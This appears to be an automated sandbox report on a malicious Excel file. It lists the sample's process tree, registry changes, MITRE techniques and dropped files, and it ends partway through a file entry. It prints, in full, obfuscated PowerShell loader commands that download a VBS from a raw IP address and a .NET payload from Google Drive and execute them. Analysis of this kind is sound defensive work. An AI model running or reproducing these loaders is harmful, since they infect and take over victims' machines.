7a131ae2f6bee4502aa717926cda6045a5528ba6a25d3dd3a5fbbb880af942ce

Analysis

max time kernel
121s
max time network
126s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
07-11-2024 02:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7a131ae2f6bee4502aa717926cda6045a5528ba6a25d3dd3a5fbbb880af942ce.xls
Size

1.1MB
MD5

2fa05b6430d95473b907dfe83338f462
SHA1

3f830f801f4225891075a0fc5c2ef6cc8bc361cb
SHA256

7a131ae2f6bee4502aa717926cda6045a5528ba6a25d3dd3a5fbbb880af942ce
SHA512

fabf49e054a9fcf6cabb82f64c319a713adc058dbe2406a29b9744473bc94b960eb7208dc58855cfb14dd3442d70fd753054201877c451d042e03b12e13a7318
SSDEEP

24576:5yaZxvseowaDI9eqvBw2L+LXlkWlXTgNXMAdsNUnh:5T0DIRvBwCuXlpM8usNAh

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

exe.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

Signatures

Blocklisted process makes network request 5 IoCs

flow	pid	Process
20	1440	mshta.exe
21	1440	mshta.exe
23	2032	powErshEll.eXe
25	2220	powershell.exe
27	2220	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
988	powershell.exe
2220	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
2032	powErshEll.eXe
684	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
25	drive.google.com
24	drive.google.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powErshEll.eXe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powErshEll.eXe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 040000000100000010000000324a4bbbc863699bbe749ac6dd1d46240f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a190000000100000010000000fd960962ac6938e0d4b0769aa1a64e262000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	mshta.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1708	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2032	powErshEll.eXe
684	powershell.exe
2032	powErshEll.eXe
2032	powErshEll.eXe
988	powershell.exe
2220	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2032	powErshEll.eXe
Token: SeDebugPrivilege	684	powershell.exe
Token: SeDebugPrivilege	988	powershell.exe
Token: SeDebugPrivilege	2220	powershell.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
1708	EXCEL.EXE
1708	EXCEL.EXE
1708	EXCEL.EXE
1708	EXCEL.EXE
1708	EXCEL.EXE

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 1440 wrote to memory of 2032	1440	mshta.exe	33
PID 1440 wrote to memory of 2032	1440	mshta.exe	33
PID 1440 wrote to memory of 2032	1440	mshta.exe	33
PID 1440 wrote to memory of 2032	1440	mshta.exe	33
PID 2032 wrote to memory of 684	2032	powErshEll.eXe	35
PID 2032 wrote to memory of 684	2032	powErshEll.eXe	35
PID 2032 wrote to memory of 684	2032	powErshEll.eXe	35
PID 2032 wrote to memory of 684	2032	powErshEll.eXe	35
PID 2032 wrote to memory of 2880	2032	powErshEll.eXe	36
PID 2032 wrote to memory of 2880	2032	powErshEll.eXe	36
PID 2032 wrote to memory of 2880	2032	powErshEll.eXe	36
PID 2032 wrote to memory of 2880	2032	powErshEll.eXe	36
PID 2880 wrote to memory of 1980	2880	csc.exe	37
PID 2880 wrote to memory of 1980	2880	csc.exe	37
PID 2880 wrote to memory of 1980	2880	csc.exe	37
PID 2880 wrote to memory of 1980	2880	csc.exe	37
PID 2032 wrote to memory of 380	2032	powErshEll.eXe	39
PID 2032 wrote to memory of 380	2032	powErshEll.eXe	39
PID 2032 wrote to memory of 380	2032	powErshEll.eXe	39
PID 2032 wrote to memory of 380	2032	powErshEll.eXe	39
PID 380 wrote to memory of 988	380	WScript.exe	40
PID 380 wrote to memory of 988	380	WScript.exe	40
PID 380 wrote to memory of 988	380	WScript.exe	40
PID 380 wrote to memory of 988	380	WScript.exe	40
PID 988 wrote to memory of 2220	988	powershell.exe	42
PID 988 wrote to memory of 2220	988	powershell.exe	42
PID 988 wrote to memory of 2220	988	powershell.exe	42
PID 988 wrote to memory of 2220	988	powershell.exe	42

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\7a131ae2f6bee4502aa717926cda6045a5528ba6a25d3dd3a5fbbb880af942ce.xls
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1708

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1440
- C:\Windows\SysWOW64\winDOWspOweRsheLl\V1.0\powErshEll.eXe
  "C:\Windows\sySTEm32\winDOWspOweRsheLl\V1.0\powErshEll.eXe" "POweRsHeLl -eX ByPaSs -NOP -W 1 -C DevIceCredeNTiaLdepLOyMenT ; ieX($(Iex('[syStem.TExT.encodiNG]'+[ChAr]58+[chAr]0x3A+'Utf8.geTsTRing([sYsTem.CoNVErT]'+[ChAr]0x3A+[CHAr]0x3A+'FROmBaSe64StriNG('+[cHaR]0X22+'JFZ3SjZCMXZ5ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlUmRlRklOaVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhZTixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrck9jVWhmcU1VLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdhLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlaW1PUVplQ1NpWixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB2VCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlVwIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuZ0tHbVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFZ3SjZCMXZ5OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjUyLzEyMC9waWN0dXJld2l0aG1lYmFja3dpdGhuZXd0aGluZ3NncmVhdGZvcm1lLnRJRiIsIiRFblY6QVBQREFUQVxwaWN0dXJld2l0aG1lYmFja3dpdGhuZXd0aGluZ3NncmVhdGZvcm1lLnZicyIsMCwwKTtzdEFyVC1TTGVFcCgzKTtzdGFyVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhtZWJhY2t3aXRobmV3dGhpbmdzZ3JlYXRmb3JtZS52YnMi'+[CHar]0x22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2032
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX ByPaSs -NOP -W 1 -C DevIceCredeNTiaLdepLOyMenT
    3⤵
    - Evasion via Device Credential Deployment
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:684
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yyktdyot.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2880
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES501.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC500.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1980
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\picturewithmebackwithnewthingsgreatforme.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:380
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRlbnY6Y09Nc3BFY1s0LDI0LDI1XS1Kb0lOJycpKCAoJzU2dWltYWdlVXJsID0gdklPaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xVXlIcXdyblhDbEtCSjNqJysnNjNMbDF0MlN0VmdHeGJTdDAgdklPOzU2dXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7NTZ1aScrJ21hZ2VCeXRlcyA9IDU2dXdlYkNsaWVudC5Eb3dubG9hZERhdGEoNTZ1aW1hZ2VVcmwpOzU2dWltYWdlVGV4dCA9ICcrJ1tTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKDU2dWltYWdlQnknKyd0ZXMpOzU2dXN0YXJ0RmxhZyA9IHZJTzw8QkFTRTY0X1NUQVJUPj52SU8nKyc7NTZ1ZW5kRmxhZyA9IHZJTzw8QkFTRTY0X0VORD4+dklPOzU2dXN0YXJ0SW5kZXggPSA1NnVpbWFnZVRleHQuSW5kZXhPZig1NnVzdGFydEZsYWcpOzU2dWVuZEluZGV4ID0gNTZ1aW1hZ2VUZXh0LkluZGV4T2YoNTZ1ZW5kRmxhZyk7NTZ1c3RhcnRJbmRleCAtZ2UgMCAtYW5kIDU2dWVuZCcrJ0luZGV4IC1ndCA1NnVzdGFydEluZGV4OzU2dXN0YXJ0SW5kZXggKz0gNTZ1c3RhcnRGbGFnLkxlbmd0aDs1NnViYXNlNjRMZW5ndGggPSA1NnVlbmRJbmQnKydleCAtIDU2dXN0YXJ0SW5kZXg7NTZ1YmFzZTY0Q29tbWFuZCA9IDU2dWltYWdlVGV4dC5TdWJzdHJpbmcoNTYnKyd1c3RhcnRJbmRleCwgNTZ1YmFzZTY0TGVuZ3RoKTs1NnViYXNlNjRSZXZlcnNlZCA9IC1qJysnb2luJysnICg1NnViYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgNmlrIEZvckVhY2gtT2JqZWN0IHsgNTZ1XyB9KVstMS4uLSg1NicrJ3ViYXNlNicrJzRDb21tYW5kLkxlbmd0aCldOzU2dWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoNTZ1YmFzZTY0UmV2ZXJzZWQpOzU2dWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlJysnbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6JysnTG9hZCg1NnVjb21tYW5kQnl0ZXMpOzU2dXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QodklPVkEnKydJJysndklPKTs1NnV2YWlNZXRob2QuSW52b2tlKDU2dW51bGwsIEAodklPdCcrJ3h0LktMR0xMLzAyMS8yNS43Ljg2MS40JysnMDEvLzpwdHRodklPLCAnKyd2SU9kZXNhdGl2YWRvdicrJ0lPLCB2SU9kZXNhdGl2YWRvdklPLCB2SU9kZXNhdGl2YWRvdklPLCB2SU9hc3BuZXRfY29tcCcrJ2lsZXJ2SU8sIHZJT2Rlc2F0aXZhZG92SU8sICcrJ3ZJT2Rlc2F0aXZhZG92SU8sdklPZGVzYXRpdmFkb3ZJTyx2SU9kZXNhdGl2YWRvdklPLHZJT2RlcycrJ2F0aXZhZG92SU8sdklPZGVzYXRpdmFkb3ZJTyx2SU9kZXNhdGl2YWRvdklPLHZJTzF2SU8sdklPZGVzYXRpdmFkJysnb3ZJTykpOycpLnJlcExhQ0UoKFtjaEFSXTU0K1tjaEFSXTEwNStbY2hBUl0xMDcpLFtzVFJpbmddW2NoQVJdMTI0KS5yZXBMYUNFKCd2SU8nLFtzVFJpbmddW2NoQVJdMzkpLnJlcExhQ0UoJzU2dScsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:988
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $env:cOMspEc[4,24,25]-JoIN'')( ('56uimageUrl = vIOhttps://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j'+'63Ll1t2StVgGxbSt0 vIO;56uwebClient = New-Object Sy'+'stem.Net.WebClient;56ui'+'mageBytes = 56uwebClient.DownloadData(56uimageUrl);56uimageText = '+'[System.Text.Encoding]::UTF8.GetString(56uimageBy'+'tes);56ustartFlag = vIO<<BASE64_START>>vIO'+';56uendFlag = vIO<<BASE64_END>>vIO;56ustartIndex = 56uimageText.IndexOf(56ustartFlag);56uendIndex = 56uimageText.IndexOf(56uendFlag);56ustartIndex -ge 0 -and 56uend'+'Index -gt 56ustartIndex;56ustartIndex += 56ustartFlag.Length;56ubase64Length = 56uendInd'+'ex - 56ustartIndex;56ubase64Command = 56uimageText.Substring(56'+'ustartIndex, 56ubase64Length);56ubase64Reversed = -j'+'oin'+' (56ubase64Command.ToCharArray() 6ik ForEach-Object { 56u_ })[-1..-(56'+'ubase6'+'4Command.Length)];56ucommandBytes = [System.Convert]::FromBase64String(56ubase64Reversed);56uloadedAssembly = [Syste'+'m.Reflection.Assembly]::'+'Load(56ucommandBytes);56uvaiMethod = [dnlib.IO.Home].GetMethod(vIOVA'+'I'+'vIO);56uvaiMethod.Invoke(56unull, @(vIOt'+'xt.KLGLL/021/25.7.861.4'+'01//:ptthvIO, '+'vIOdesativadov'+'IO, vIOdesativadovIO, vIOdesativadovIO, vIOaspnet_comp'+'ilervIO, vIOdesativadovIO, '+'vIOdesativadovIO,vIOdesativadovIO,vIOdesativadovIO,vIOdes'+'ativadovIO,vIOdesativadovIO,vIOdesativadovIO,vIO1vIO,vIOdesativad'+'ovIO));').repLaCE(([chAR]54+[chAR]105+[chAR]107),[sTRing][chAR]124).repLaCE('vIO',[sTRing][chAR]39).repLaCE('56u','$'))"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2220

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\75CA58072B9926F763A91F0CC2798706_056B48C93C4964C2E64C0A8958238656

Filesize
1KB

MD5
bef19c49da52c7f68e0ad45e90c70568

SHA1
937b0a6a7b1fec9c491b89bd8d82a97af69dc707

SHA256
81491366dc6cef9cede4a594f9ec0193393a9e667e68ff66fe9a1796455e4c48

SHA512
2915d3a89c62bc839651159bc9b105d0df9dd14cda99e5c17f295a16a25388f08520a7ceca925460ce97d968b9eb8e91d720e4f4bf3b8bcd81d383a5e2d52eb3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62

Filesize
2KB

MD5
66b8e52f6d682ffbbb3baca244831960

SHA1
a6f6336d059949a32273a491a8b99832804770a3

SHA256
8fb788a5d531dc1bface8c316635c407b96b881a1dc65812d63e13095d784aad

SHA512
af041ecbc4385b6df1b0618e7b3a22de0e51c94907c053d84cd80518d18e9b8b4009f4771581e7ddf14891569054d9173a0a39fd3cc2b64a244513915fcbf92f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894

Filesize
1KB

MD5
1dd805f0ebb8a424dead9fd3ef57f0f2

SHA1
20d5f63c88d4844025c544db8170d5bc3f480492

SHA256
1c494ac0b3ff01ab6784f9db66e387895afb4805ab888bd089ce000fc1101117

SHA512
fcd06fb5325365dc5e60e222d252a4bf069d4172996eac0b799278961ceb865f6d056abad1cbf11534716221158e2199a25202862d639eab1c54403860dbb043

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F53EB4E574DE32C870452087D92DBEBB_2EEDDB29953A46217D3D6BE21EA36A5B

Filesize
471B

MD5
8955bb560abf515e94ca68dd87ef93b4

SHA1
edfe758796fd694f425d843c9d68689485743a4d

SHA256
e8da732b763426bd055a381d3647dc506f3c5d14fe0bf6e0b174c2365306c3c4

SHA512
ce74e7a1fd0b5baa6781d54dca087e81b8f9f68582ca935a40fd235510ed15ce8351561d8bda74f584a01225e63e5bcf99dd16953c8efb03064435aad7153173

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\75CA58072B9926F763A91F0CC2798706_056B48C93C4964C2E64C0A8958238656

Filesize
434B

MD5
7fa75aebbafa6132194df253e01c0ca9

SHA1
9c285cb5b275367da0da6c01ac36fb9dda0ddb16

SHA256
84a740281dd2db72dc5002bd6d9ed04bb4504fab113698e858d0b5abb8afeee5

SHA512
b670d11a4742bf87ac45320803d741160fb76533057a32ff8b574b37db2877063e4b4d276ede7872a4eab88dd0cd88765bddf50caa6b80d3a1af50edd4cbf5c6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
4c1f315b7b967edab6316aabbf415de8

SHA1
6aa7939cb8b1a70fbc36ca11aaf17cc9208ce9fa

SHA256
6d1976ef8fe4118ad808a53fc8b0683baacb10bda24edbeed4b978863c464bc1

SHA512
0b3e7ddb37e5fbfbf471a4c4cd937e55bd639afffbcffbbbcaf48c95286fca8d3b142245b658b18d10e42f8efe9a3cece2891bf02e4734b7a2ab3fa1990d0200

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
c127e5331d2feeabea3626c23318600e

SHA1
ab1eb4ae663f34b3eb84493d4f95449bab9b03da

SHA256
f91a83e10c70620f11868ee1256948c2a34dc28b01ad553a12edf0dcf5d664e8

SHA512
4e862fad5f889176791304517fa5d1e4f63a6efed76daaab7ec76ff4e01bd4037822175a8dcca15fee21bbdeaa378aaa700e0e9d37eaef13e8891e96f8a72ad7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62

Filesize
458B

MD5
0e070d83014c766308fdb12cf647a02e

SHA1
c30b1a50e181e7e6ba7fdec1d8f880485f5d03a7

SHA256
3c902b173087d8c807ad42cfbeccf619181f1c99f37bfa163021cf9b4c997a1d

SHA512
310a3e4dd14fd421427743677ed769989a3993304c6ac2b99f2bf558f93006210408d028a0d1cf28b22a42a98a0b481411a8801f2466e5d3a7a04073050be87d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894

Filesize
432B

MD5
c249a86c04c53287f57eee124fc8eb1b

SHA1
95558389e9d40007f659626b727764c4296ab8fe

SHA256
47be264f863f5d4ba4f47df9d88a35e5d75a59f673410d754143ac0e445b5d98

SHA512
fd72c82ad7f0543892d161b2f79edaf75c28b70e0ad1bd3e7c100a9c08320acbb761d0942ea4f8a47220f2fb0832e00db046b16a88d2f2f5be2e94d6fe276f0c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F53EB4E574DE32C870452087D92DBEBB_2EEDDB29953A46217D3D6BE21EA36A5B

Filesize
426B

MD5
96d1c560b3f42ab7e1213f0c6991ab67

SHA1
1da9b3f179ddeee6cbb1437567a80a2ad3bdb724

SHA256
101ae095ee84c147e74d54dd098652d1071dcbabbd3ab5329864f64adf88f41a

SHA512
52ab9ffef1fd9943cdd47d12693f682c555d0798347b9eaecfc44ac2c47148210f679769a6b8e1537f1373d7200fcfa54b3625a51aaae008494349237536e761

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Q0WBLVJY\seethegoodthingswhicgivenyoubest[1].hta

Filesize
8KB

MD5
fdc2227a092a122e75dbb3bc25459f01

SHA1
5627c9fc5f4751c56b5fcc9ecd408194116ce039

SHA256
f6c4678b475763c7e30388a9a6363be6acdedbbdf4c64e4c0a34e0670a886e9a

SHA512
c1c5b5e2f4a143e4ced9de21799fc9889f8c6a0f674de460fe282d182083fb20b16c4c6098148155fb6292d27fd13a96f3589f22c83f872db20fcca444ca2507

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabF03B.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES501.tmp

Filesize
1KB

MD5
5c629b944bb3b791cc90c29f708572e0

SHA1
900ad515d4033eb4ec57c58b935fa3efe02ac776

SHA256
